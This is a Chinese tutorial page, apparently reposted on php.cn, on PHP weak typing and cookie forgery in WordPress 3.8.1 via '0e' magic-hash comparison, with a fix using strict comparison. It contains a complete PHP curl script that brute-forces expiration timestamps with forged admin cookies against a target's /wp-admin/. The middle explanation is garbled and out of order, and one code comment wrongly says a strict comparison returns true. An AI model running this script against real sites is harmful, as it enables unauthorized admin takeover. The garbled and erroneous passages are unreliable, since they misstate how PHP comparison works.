首页 >php教程 >php手册 >PHP弱类型:WordPress Cookie伪造,wordpresscookie

PHP弱类型:WordPress Cookie伪造,wordpresscookie

WBOY
WBOY原创
2016-06-13 08:56:181087浏览

PHP弱类型:WordPress Cookie伪造,wordpresscookie

1 PHP弱类型

  PHP是弱类型语言,所以变量会因为使用场景的不同自动进行类型转换。PHP中用 == 以及 != 进行相等判断时,会自动进行类型转换,用 === 以及 !== 进行判断时不会自动转换类型。

<span>1</span> <?<span>php
</span><span>2</span>     <span>$a</span> = 3<span>;
</span><span>3</span>     <span>$b</span> = '3vic'<span>;
</span><span>4</span>     <span>var_dump</span>(<span>$a</span> == <span>$b</span>);<span>//</span><span>true</span>
<span>5</span>     <span>var_dump</span>(<span>$a</span> != <span>$b</span>);<span>//</span><span>false</span>
<span>6</span>     <span>var_dump</span>(<span>$a</span> === <span>$b</span>);<span>//</span><span>true</span>
<span>7</span>     <span>var_dump</span>(<span>$a</span> !== <span>$b</span>);<span>//</span><span>false</span>
<span>8</span> ?>

 说明:在PHP中字符串转换成整型时,如果是数字开头就会转换成前面的数字('3vic' -> 3),如果不是数字开头,那么就会转换成0('vic' -> 0)

2 WordPress代码

  • WordPress 3.8.1 WordPress 3.8.2 部分代码区别
<span>1</span> <?<span>php
</span><span>2</span>     <span>//</span><span> WordPress 3.8.1</span>
<span>3</span>     <span>if</span> (<span>$hmac</span> != <span>$hash</span><span>) {}
</span><span>4</span>     <span>//</span><span> WordPress 3.8.2</span>
<span>5</span>     <span>if</span> ( hash_hmac('md5', <span>$hmac</span>, <span>$key</span>) !== hash_hmac('md5', <span>$hash</span>, <span>$key</span><span>) )  {}
</span><span>6</span> ?>
  • Cookie 组成

  客户端后台只验证其中的一条Cookie,如下所示

wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|<span>1433403595</span>|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly

  其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 格式为 wordpress_ md5(siteurl)  其中siteurl为WordPress的网址,此处网站地址为<code><span>http://www.test.ichunqiu</span>,http://www.test.ichunqiu<span>c47f4a97d0321c1980bb76fc00d1e78f</span>,md5加密后为

c47f4a97d0321c1980bb76fc00d1e78f

,其它部分也可省。

对应变量 $username $expiration $hmac
cookies admin 1433403595 cf50f3b50eed94dd0fdc3d3ea2c7bbb
类型      用户名     过期时间        登录成功服务器端赋予客户端的hash值

对应变量

$username

$expiration
  • $hmac
  • cookies

    admin 1433403595
    <span>1</span> <?<span>php
    </span><span>2</span>     <span>$key</span> = wp_hash(<span>$username</span> . <span>$pass_frag</span> . '|' . <span>$expiration</span>, <span>$scheme</span><span>);
    </span><span>3</span>     <span>$hash</span> = hash_hmac('md5', <span>$username</span> . '|' . <span>$expiration</span>, <span>$key</span><span>);
    </span><span>4</span>     <span>if</span> ( <span>$hmac</span> != <span>$hash</span><span> ) {
    </span><span>5</span>     do_action('auth_cookie_bad_hash', <span>$cookie_elements</span><span>);
    </span><span>6</span>     <span>return</span> <span>false</span><span>;
    </span><span>7</span> }

    cf50f3b50eed94dd0fdc3d3ea2c7bbb

        $expiration  <span>$expiration </span> 分析验证登录$hash   代码
      wp-includes/pluggable.php
    • 第543-549行
    •   在代码所使用的变量中,通过改变客户端Cookie 的方式可控的有
    $username

    用户名,$expiration$hmac == $hash 有效期,又因为其中用户名是固定的,因此只有$hmac 是可控的,所以我们可以从改变 $expiration <span>$hash</span> 的方法来改变$hmac if ( $hmac != $hash ) { 结合PHP Hash <span>var_dump($hmac);die()</span>;比较缺陷分析 WordPress$hmac   有以下几种可能使string '0' 为真,字符串完全相等或者 int 0

    等于0的同时 <pre class="code">&lt;span&gt;1&lt;/span&gt; &lt;?&lt;span&gt;php &lt;/span&gt;&lt;span&gt;2&lt;/span&gt; &lt;span&gt;var_dump&lt;/span&gt;('0' == '0e156464513131');&lt;span&gt;//&lt;/span&gt;&lt;span&gt;true&lt;/span&gt;</pre>$hash<p> </p>为以字符开头的字符串; 将客户端的Cookie中 0e156464513131 值改为0,然后在$hash 的上面一行写入<code><span>$hmac</span> var_dump($hmac);die();发现打印出来 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 的结果是 $hash 而不是

    , 那么有没有方法使字符串识别为整数呢,代码如下:

      其中的 会被识别为0乘以10的156464513131次方,还是得0;因此当

    <span> 1</span> <?<span>php
    </span><span> 2</span> <span>/*</span>
    <span> 3</span> 
    <span> 4</span> <span>本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测
    </span><span> 5</span> <span>传入两个值
    </span><span> 6</span> <span>  WordPress 的主页 $host
    </span><span> 7</span> <span>  管理员用户名     $root
    </span><span> 8</span> <span>*/</span>
    <span> 9</span>     <span>header</span>("Content-type:text/html;charset=utf-8"<span>);
    </span><span>10</span> 
    <span>11</span>     <span>$host</span> = 'http://xxx.xxx.xxx';<span>//</span><span>主页地址 结尾不带'/'</span>
    <span>12</span>     <span>$root</span> = 'user';<span>//</span><span>管理员用户名</span>
    <span>13</span> 
    <span>14</span>     <span>$url</span> = <span>$host</span>.'/wp-admin/';<span>//</span><span>后台管理地址    </span>
    <span>15</span>     <span>$sitehash</span>=<span>md5</span>(<span>$host</span><span>); 
    </span><span>16</span> 
    <span>17</span>     <span>echo</span> "\nWelcome\n\n"<span>;
    </span><span>18</span>     <span>//</span><span>通过时间戳暴力破解cookie 实现伪造cookie</span>
    <span>19</span>     <span>for</span>(<span>$i</span>=1500000000;<span>$i</span><1600000000;<span>$i</span>++<span>){
    </span><span>20</span>         <span>$cookie</span> = "wordpress_".<span>$sitehash</span>."=".<span>$root</span>."|".<span>$i</span>."|0;";<span>//</span><span>组合构造cookie</span>
    <span>21</span>         <span>$header</span> = <span>array</span><span>(
    </span><span>22</span>        "Content-Type:application/x-www-form-urlencoded",
    <span>23</span>       'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',
    <span>24</span>       "Cookie:".<span>$cookie</span>,
    <span>25</span> <span>      );
    </span><span>26</span> 
    <span>27</span>         <span>$curl</span> = curl_init(); <span>//</span><span> 启动一个CURL会话    </span>
    <span>28</span>         curl_setopt(<span>$curl</span>, CURLOPT_URL, <span>$url</span>); <span>//</span><span> 要访问的地址</span>
    <span>29</span>         curl_setopt(<span>$curl</span>, CURLOPT_FOLLOWLOCATION, 1); <span>//</span><span> 使用自动跳转    </span>
    <span>30</span>         curl_setopt(<span>$curl</span>, CURLOPT_AUTOREFERER, 1); <span>//</span><span> 自动设置Referer    </span>
    <span>31</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTPGET, <span>true</span>); <span>//</span><span> 发送一个常规的Post请求    </span>
    <span>32</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTPHEADER, <span>$header</span>); <span>//</span><span> 读取上面所储存的Cookie信息         </span>
    <span>33</span>         curl_setopt(<span>$curl</span>, CURLOPT_RETURNTRANSFER, 1); <span>//</span><span> 获取的信息以文件流的形式返回 </span>
    <span>34</span>         curl_setopt(<span>$curl</span>, CURLOPT_HEADER, <span>false</span><span>);
    </span><span>35</span>         curl_setopt(<span>$curl</span>, CURLOPT_HEADER, 0<span>);   
    </span><span>36</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);<span>//</span><span>让curl自动选择版本</span>
    <span>37</span>         <span>$tmpInfo</span> = curl_exec(<span>$curl</span>); <span>//</span><span> 执行操作</span>
    <span>38</span>         <span>if</span> (curl_errno(<span>$curl</span><span>)) {    
    </span><span>39</span>         <span>echo</span> 'Errno'.curl_error(<span>$curl</span><span>);    
    </span><span>40</span> <span>        }    
    </span><span>41</span>         curl_close(<span>$curl</span>); <span>//</span><span> 关闭CURL会话
    </span><span>42</span> 
    <span>43</span> <span>        //匹配结果</span>
    <span>44</span>         <span>if</span>(<span>strstr</span>(<span>$tmpInfo</span>,'我们准备了几个链接供您开始'<span>)){
    </span><span>45</span>             <span>echo</span>  "\n".'success : '.<span>$cookie</span>."\n\n"<span>;
    </span><span>46</span>             <span>break</span><span>;
    </span><span>47</span>         }<span>else</span><span>{
    </span><span>48</span>             <span>echo</span>  'fail : '.<span>$cookie</span>."\n"<span>;
    </span><span>49</span> <span>        }
    </span><span>50</span> 
    <span>51</span> <span>    }
    </span><span>52</span> ?>    

    以0e开头后面全是数字时就会与 <span>$hmac<span> </span></span>的值为 '0' 时相等,所以我们可以将客户端的Cookie设置为类似 然后不断更新过期时间(现在1433403595的位置)的方法来碰撞服务器端,一旦 的值为0e开头后面全是数字即可验证通过。假设碰撞成功,就修改浏览器的Cookie,直接访问后台地址,就可以成功登陆后台。 3 测试脚本   通过改变客户端Cookie里过期时间的值,不断尝试登录后台,找出可以进入后台的时间戳,从而实现Cookie伪造登录后台。

      说明

    理论上32位的MD5值以0e开头的大概三亿分之一,碰撞到可以利用的 <span>$expiration </span>几率极低

    5 修复方案

      PHP 中使用的哈希比较函数,将其中的 == , != 分别更改为 === 和 !== 或者 将比较的两个变量使用MD5再加密一次。 学习笔记:http://ichunqiu.com/course/167
    声明:
    本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn